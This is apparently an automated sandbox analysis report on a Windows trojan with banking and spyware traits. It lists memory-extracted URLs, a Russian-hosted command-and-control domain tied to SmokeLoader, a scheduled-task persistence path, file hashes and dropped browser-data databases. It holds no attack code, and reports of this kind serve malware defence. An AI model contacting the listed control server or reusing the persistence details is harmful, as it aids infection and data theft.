                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1731083282.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1731083282.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://word.office.comexplorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://prolinice.ga/explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://prolinice.ga/=explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://prolinice.ga:80/index.phpexplorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.micrexplorer.exe, 00000001.00000000.1729353943.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1727291889.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1728897911.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000006.00000002.1956613264.0000000003294000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1727291889.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.msn.com/explorer.exe, 00000001.00000000.1728897911.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000006.00000002.1956613264.0000000003228000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.1944673317.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.1955894344.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2944561786.0000000000698000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2127081102.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2944628748.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2943892684.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2944692360.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2943579031.00000000004E8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://outlook.com_explorer.exe, 00000001.00000000.1731083282.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000006.00000003.1943827319.0000000003293000.00000004.00000020.00020000.00000000.sdmp, AB8B.tmp.6.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1727291889.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      77.232.129.190
                      		prolinice.gaRussian Federation
                      		42145BSTV-ASRUtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1448294
                      Start date and time:2024-05-28 08:22:43 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 6s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:18
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                      Detection:MAL
                      Classification:mal100.bank.troj.spyw.evad.winEXE@21/15@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 106
                      • Number of non-executed functions: 89
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.22
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      02:23:59API Interceptor133836x Sleep call for process: explorer.exe modified
                      02:24:19API Interceptor1x Sleep call for process: WerFault.exe modified
                      07:23:58Task SchedulerRun new task: Firefox Default Browser Agent A0E47F6C8157959D path: C:\Users\user\AppData\Roaming\rrrrcve

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      77.232.129.190#20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                      • prolinice.ga/index.php

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      prolinice.ga#20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                      • 77.232.129.190

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      BSTV-ASRU#20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                      • 77.232.129.190
                      RkdXl7E3rG.exeGet hashmaliciousAsyncRATBrowse
                      • 77.232.132.25
                      nMbRell419.exeGet hashmaliciousAsyncRAT, GMiner, QuasarBrowse
                      • 77.232.132.25
                      2ctyhHi7vb.exeGet hashmaliciousAsyncRAT, GMiner, QuasarBrowse
                      • 77.232.132.25
                      jOR8nr6mAC.exeGet hashmaliciousQuasarBrowse
                      • 77.232.132.25
                      kPl1mZTpru.exeGet hashmaliciousTofseeBrowse
                      • 77.232.138.239
                      mtxfh5xJDf.exeGet hashmaliciousQuasarBrowse
                      • 77.232.132.25
                      file.exeGet hashmaliciousTofseeBrowse
                      • 77.232.132.142
                      BMTxyapegR.exeGet hashmaliciousAsyncRATBrowse
                      • 77.232.132.25
                      q05RiWoYOiGet hashmaliciousMiraiBrowse
                      • 77.232.157.125

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_6c27ab4b-6ae5-4dcd-a89c-b4ed2f362b19\Report.wer

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.9426999761880487
                      Encrypted:false
                      SSDEEP:192:NmMTeCnQ0LZTkrjyaVwzuiF/Z24lO8kT:lKCnrLZTWjKzuiF/Y4lO8kT
                      MD5:5D820F184B05E8A8523D59AEA644A73C
                      SHA1:8F797015C00EB13764B719D1BD6BAA225745091C
                      SHA-256:E49EF49C343DCAD6FDC2DEAAA2462361A5B34B630111243202898E62E71A2C85
                      SHA-512:764D95936C071EF32A3C6A459B9C8A892CE596E2614C904878E531709194CD88B9276C46691B52A9701DFF2A795C172FCA9D42FD1C7E6AA04D86A1929429F581
                      Malicious:false
                      Reputation:low
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.3.5.1.0.4.7.6.8.8.4.0.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.3.5.1.0.4.8.4.0.7.1.5.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.2.7.a.b.4.b.-.6.a.e.5.-.4.d.c.d.-.a.8.9.c.-.b.4.e.d.2.f.3.6.2.b.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.a.a.1.e.a.8.-.2.0.e.e.-.4.2.e.e.-.8.a.7.5.-.0.9.1.f.0.2.e.0.e.6.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.4.-.0.0.0.1.-.0.0.1.4.-.6.4.5.7.-.2.d.a.3.c.7.b.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4BB.tmp.dmp

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:Mini DuMP crash report, 14 streams, Tue May 28 06:24:07 2024, 0x1205a4 type
                      Category:dropped
                      Size (bytes):58918
                      Entropy (8bit):1.5452193116090096
                      Encrypted:false
                      SSDEEP:96:5z8ZulQphpObaZDKeLMREX4eAdbEZJR99Dm+z4ugbsi72Aqxm+c2F65jmy5VmtgI:WHDybE7RGsxO2pxdsNbFi1qGg/lViTR
                      MD5:B8C07AF64786B6F2B9F76668A2EFD820
                      SHA1:CB917B166A836D64FD51D0DA208D0DAE9B233DD5
                      SHA-256:C4874156AE6496CCBEB376C2F2ED6FD6222E14F1EDC9F272A073528D9EADB7C2
                      SHA-512:CA6BFE552ADB8FF1BEFE55ED96AB459F2FC07EE1A14B64C2FFF2D8414F74217E7CDC478BF2F94EE199E6B8D996F377DF72BC66DCF431EAEE4C99D3409AFF784B
                      Malicious:false
                      Preview:MDMP..a..... ........xUf.........................................7..........T.......8...........T...........0...............L...........8...............................................................................eJ..............Lw......................T.......$....xUf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5D5.tmp.WERInternalMetadata.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8560
                      Entropy (8bit):3.693949846702332
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJVeI6Y9L7gmfqtjb1+pDz89b5iCfbTm:R6lXJcI6YR7gmfqtjB35nf+
                      MD5:8AB0A0BB36FC28182C5A32FE85EDB403
                      SHA1:E6951A66765E7161F8EA8B36F0EB50A7AA8F3817
                      SHA-256:9A63805185E7F5973531A1BC2A18CEB5C6E66E996F2439055BF836078564A642
                      SHA-512:98FDA4CB02C792ED96F4CFB3B18A1893A68896A57BD1F6C8762B1C5BDF0CF3BC3D5B47A513B63AE926D404467489D93560BC154A33A5C9D6088B52D855A22B74
                      Malicious:false
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.1.6.<./.P.i.

                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC605.tmp.xml

                      Download File
                      Process:C:\Windows\System32\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4719
                      Entropy (8bit):4.448719722969122
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zs4Jg771I98CWWpW8VY4INPYm8M4JYcFOyq85MgAb9Q3hd:uIjf+I7e37Vn8SJGkAba3hd
                      MD5:5253A6D8B863E871E3314939AAA28707
                      SHA1:8D55965094C44DF58AF250F3389F785E8056A7A0
                      SHA-256:7EE0619D84586321249DBC8C3491476A1D7A50FC94FCECB2C92A48C675868A0B
                      SHA-512:F5EFB0F6292480D5261BEAB8139CF1CBC42D5636A5DDD77813302D36BB2A6F4671964049A2A792D35F56EEDDED5DB8DEF9936D006767E7F84AADE1EBA8F078CD
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="342566" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                      C:\Users\user\AppData\Local\Temp\A711.tmp

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\A711.tmp-shm

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):0.017262956703125623
                      Encrypted:false
                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                      Malicious:false
                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\A983.tmp

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):0.017262956703125623
                      Encrypted:false
                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                      Malicious:false
                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\AA70.tmp

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\AB2C.tmp

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                      Category:dropped
                      Size (bytes):28672
                      Entropy (8bit):2.5793180405395284
                      Encrypted:false
                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\AB8B.tmp

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\ABDA.tmp

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
